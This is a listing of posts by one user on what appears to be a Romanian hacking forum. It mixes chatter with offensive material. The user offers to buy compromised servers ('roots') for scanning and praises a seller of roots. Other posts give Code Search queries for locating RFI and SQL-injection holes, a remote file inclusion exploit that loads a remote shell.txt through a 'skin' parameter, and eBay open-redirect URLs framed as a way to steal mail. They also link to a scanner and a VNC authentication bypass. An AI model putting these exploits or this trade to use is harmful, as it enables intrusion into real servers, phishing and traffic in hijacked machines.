
x0xboy
Members-
Posts
27 -
Joined
-
Last visited
Everything posted by x0xboy
-
a++ good services fast delivery roots,scanners ++
-
Salut Cumpar rooturi compatibilile SynScan "Ss" plata prin pp/wmz/lr pm me
-
reupload va rog frumos
-
azi noapte ma gandeam la un script sa-mi schimbe banner cand dai refresh sau cand acesezi o alta pagina decat anterioarea si mi-a iesit primul meu mare script 60 lini incerc sa dezvolt ideii de la 0 sunt incepator php deci cred ca e bine pentru 2 luni de studi php ? am pus aici pentru ca pe forum e anti xss ala si ami sterge ; si nu mai stiu ce si am un demo pe hxxp://www.x0xboy.net/img/random.php hxxp://paste.uni.cc/18213
-
[RST][Video] Conquiztad0r.ro Killer [de actualitate]
x0xboy replied to kw3rln's topic in Proiecte RST
slick vezi sa nu afle astea unde stai ca dai de naiba te vezi cu toti conquiztadori la usa ca la rand la lapte -
[RST][Video] Conquiztad0r.ro Killer [de actualitate]
x0xboy replied to kw3rln's topic in Proiecte RST
eu :x0xboy: mai frate am vazut cateva filmulete care demonstreaza ca poti folosi un program. Player: gabriel30: nu e la misto facut filmul,chiar se foloseste moderator: KsEngage: x0x: e la misto facut filmuletul penibilitatea astuia depaseste limita prostiei adika zik 2 mai zik inca 20 dupa mine si ai zik ca am programu iare el ami zice bravo tie... -
[RST][Video] Conquiztad0r.ro Killer [de actualitate]
x0xboy replied to kw3rln's topic in Proiecte RST
Prea frumus mie mi-au dat tacerea deaia ca i-am zis unuia ca are capu cat damigeana -
nici pe clicknet nu merge
-
Half-Life Server 3.1.1.0 Remote Buffer Overflow Exploit
x0xboy replied to cyadron's topic in Exploituri
http://www.void.at/greuff/hoagie_hlserver.c Versiunea orginala dar niste indieni Prosti au postat pe mil0worm ca fiind nou Si celalanta cu SVN Idioti Rau -
dar mere si pe rapidshare.com ?
-
Ms Mult Slick am incercat sa copilez atunci in redhat fedora si debian si tot nu ami mergea sa speram ca asta o sa mearga
-
sysgh0st Eu am incercat sa compilez prg de la slick dar ami da 300 de mii de erori
-
uite frate ce ami da mie aici ~ [root@andromeda .,]# gcc -o scan cgiscan.c cgiscan.c: In function `Chk': cgiscan.c:23: parse error before "memset" cgiscan.c:42: parse error before "exit" cgiscan.c:48: parse error before "exit" cgiscan.c:51: parse error before "for" cgiscan.c:51: parse error before ')' token cgiscan.c:61: parse error before "rmt_host" cgiscan.c:96: `argc' undeclared (first use in this function) cgiscan.c:96: (Each undeclared identifier is reported only once cgiscan.c:96: for each function it appears in.) cgiscan.c:99: parse error before "printf" cgiscan.c:102: `In' undeclared (first use in this function) cgiscan.c:102: `argv' undeclared (first use in this function) cgiscan.c:103: parse error before "if" cgiscan.c:115: parse error before "if" cgiscan.c:126: parse error before '}' token
-
Mai moti din cate am vazut eu pe milw0rm sunt e un scanner Rooter Cum ar veni doar ai dai scan si ati scoate Ip Vulnerabile daca nu ma insel am vazut si bypass asta de lai postat u pe blacksecurity Scanneru: [url]http://www.milw0rm.com/exploits/1799[/url] Bypass: [url]http://www.blacksecurity.org/exploits/38/VNC_4.1.1_%28VNC_Null_Authentication%29_Auth_Bypass_Patch/114.html[/url]
-
Eu zik ca a fost de domeniu Trecutului Acest Daca u ami dai mie maile adika sa vad eu ca da maile .. Plm lam tinut .. O gramada de timp in screen am bagat bidd acolo am modificat Dar nimika .. Nu e Prea bun ori E prea VEchi
-
Aici un simplu exemplu De Search RFI: Injection: http://www.google.com/codesearch?hl=en&lr=&q=%28include%7Crequire%29%28_once%29%3F%5C%28%5C%24_%28GET%7CPOST%7CREQUEST%7CCOOKIE%29&btnG=Search ------------------------------------------------------------------------------------------------------------------ SQLinjection: http://www.google.com/codesearch?hl=en&lr=&q=mysql_query.%3F%5C%28%5B%22%27%5D%3F%28%5B%5E%29%5D%29*%5C%24_%28GET%7CPOST%7CREQUEST%7CCOOKIE%29.*%5C%29&btnG=Search ------------------------------------------------------------------------------------------------------------------ HTTP response splitting vulnerabilities. http://www.google.com/codesearch?hl=en&lr=&q=lang%3Aphp+header%5Cs*%5C%28%22Location%3A.*%5C%24_%28GET%7CPOST%7CCOOKIE%7CREQUEST%7CSERVER%29.*%5C%29&btnG=Search ------------------------------------------------------------------------------------------------------------------ PhP Injection: http://www.google.com/codesearch?q=%28eval%29%5C%28%5C%24_%28GET%7CPOST%7CREQUEST%7CCOOKIE%29&hl=en&lr=
-
# Class : REmote ################### # File Code Detailed #File :naboard_pnr.php? # #Code : # #include"$skin/pnr_top.php"; Exploit : [url]http://www.target.***/[/url][path]/naboard_pnr.php?skin=http://shell.txt?
-
Habar nu am sa lucrez cu el Daca e Cineva Dragut Sa ami zisca si mie adika 1 tutorial ceva pls Dau 1 Bere
-
am aflat unul dintre bug-urile de luat mail de la ebay
x0xboy replied to bossjuan's topic in Exploituri
Ori cum pana acuma Sau dus 5-6 buguri daca cineva le vrea sau ar avea idee sa le Repare Si cu ocazia asta o sa fac Un Mic Redirect la ebay Bug new -=[ [url]http://cgi1.ebay.co.uk/aw-cgi/ebayISAPI.dll?RedirectEnter&partner=25047&loc=http://rst-crew.net/[/url] ]=- -=[ [url]http://cgi1.ebay.com/aw-cgi/ebayISAPI.dll?RedirectEnter&partner=25047&loc=http://rst-crew.net/[/url] ]=- -=[ [url]http://cgi1.ebay.de/aw-cgi/ebayISAPI.dll?RedirectEnter&partner=25047&loc=http://rst-crew.net/[/url] ]=- -=[ [url]http://cgi1.ebay.it/aw-cgi/ebayISAPI.dll?RedirectEnter&partner=25047&loc=http://rst-crew.net/[/url] ]=- -=[ [url]http://cgi1.ebay.co.uk/aw-cgi/ebayISAPI.dll?RedirectEnter&partner=25047&loc=http://rst-crew.net/[/url] -
Cum devin Vip Sau .. C e trebe sa fac ! Pls pm me Si help si pe mine
-
am aflat unul dintre bug-urile de luat mail de la ebay
x0xboy replied to bossjuan's topic in Exploituri
pai de ce ami mai dat aci sa asi faca uni Sange rau ca nu au Vip ? Mai bine taceai -
Inca nu Am facut dar o sa fac cu ocazia asta